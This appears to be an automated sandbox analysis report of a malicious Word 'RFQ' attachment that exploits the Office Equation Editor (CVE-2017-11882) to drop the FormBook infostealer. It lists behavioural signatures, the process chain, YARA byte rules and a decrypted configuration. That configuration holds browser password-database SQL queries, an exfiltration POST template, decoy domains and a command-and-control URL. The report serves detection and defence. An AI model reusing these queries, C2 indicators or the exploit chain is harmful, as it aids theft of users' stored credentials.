Play interactive tour

Edit tour

Analysis Report RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc

Overview

General Information

Sample Name:	RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc
Analysis ID:	339299
MD5:	44cce032ed68104da1f632d18dd16971
SHA1:	415e8f97c4ad9392ee905cef88b814f0fd4162a2
SHA256:	1f9d1bffe188b76bbd97cb2fd59ab47248b71fcede2f415ca29fcc0f1040bbee
Tags:	doc
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2388 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2408 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

mpomboby8423.exe (PID: 2516 cmdline: C:\Users\user\AppData\Roaming\mpomboby8423.exe MD5: 06AAFD2382D63AFC9874125E5C1062B0)

mpomboby8423.exe (PID: 2852 cmdline: C:\Users\user\AppData\Roaming\mpomboby8423.exe MD5: 06AAFD2382D63AFC9874125E5C1062B0)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

help.exe (PID: 260 cmdline: C:\Windows\SysWOW64\help.exe MD5: 0F488C73AA50C2FC1361F19E8FC19926)

cmd.exe (PID: 2984 cmdline: /c del 'C:\Users\user\AppData\Roaming\mpomboby8423.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

EQNEDT32.EXE (PID: 2820 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d70c", "CONFIG SIZE : 0xf1", "CONFIG OFFSET 0x1d80b", "URL SIZE : 32", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa76d1436", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f71503e", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "capableandresilient.com", "listaprzygod.com", "cashhomeprogram.com", "aboutwheelchair.com", "clk4milli.club", "asakitreks.com", "liquiddreamworld.com", "uqur88.com", "bestifystore.com", "arancionehq.xyz", "mmoimperium.com", "houxinjian.com", "satmonitoring.com", "tidalhaven.com", "blcdevelopers.com", "piratesofthefun.com", "kadopulsa.com", "xn--o39au6k0nm4rghsaq0c.net", "wxxxtw.com", "kyrtjf.com", "rapid-rewards.club", "powerschoolnocca.com", "naturalorganizing.com", "auzura.net", "royalcopystar.com", "crowdcork.com", "xtrememasksanitizer.com", "sia-38.com", "forthathletics.com", "nissy-fore.com", "ofertaze.com", "gammachi1925.xyz", "escortslove.com", "naiyou-navi.com", "visiontoinvest.com", "thatlifeclothingco.com", "eucmia.info", "alamaula.sucks", "tidalgin.com", "netleyholdings.space", "mascofarms.com", "xn--teakdck-9wa.net", "powerlotusengineering.com", "wearsd.com", "postdatabits.com", "bossabars.net", "myivynest.com", "newcovburgawnc.com", "goldyslotvip.com", "jxappc.com", "gabrielrasskin.com", "nakshatrabeachresort.com", "reigninglegacy.net", "ghelyoun.net", "obgynpatientnews.com", "cafebabe.net", "enuyu.net", "best4ufoods.com", "institutodederechoygobierno.com", "areralind.com", "open-osrs.net", "mixtaks.life", "qtmeters.com", "haxb33.xyz", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.evana-rohanihijab.com/iic6/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.mpomboby8423.exe.280000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.mpomboby8423.exe.280000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.mpomboby8423.exe.280000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
4.2.mpomboby8423.exe.280000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.mpomboby8423.exe.280000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.mpomboby8423.exe.280000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
5.2.mpomboby8423.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.mpomboby8423.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.mpomboby8423.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
5.2.mpomboby8423.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.mpomboby8423.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.mpomboby8423.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\mpomboby8423.exe, CommandLine: C:\Users\user\AppData\Roaming\mpomboby8423.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\mpomboby8423.exe, NewProcessName: C:\Users\user\AppData\Roaming\mpomboby8423.exe, OriginalFileName: C:\Users\user\AppData\Roaming\mpomboby8423.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: C:\Users\user\AppData\Roaming\mpomboby8423.exe, ProcessId: 2516

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 92.119.114.220, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2408, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

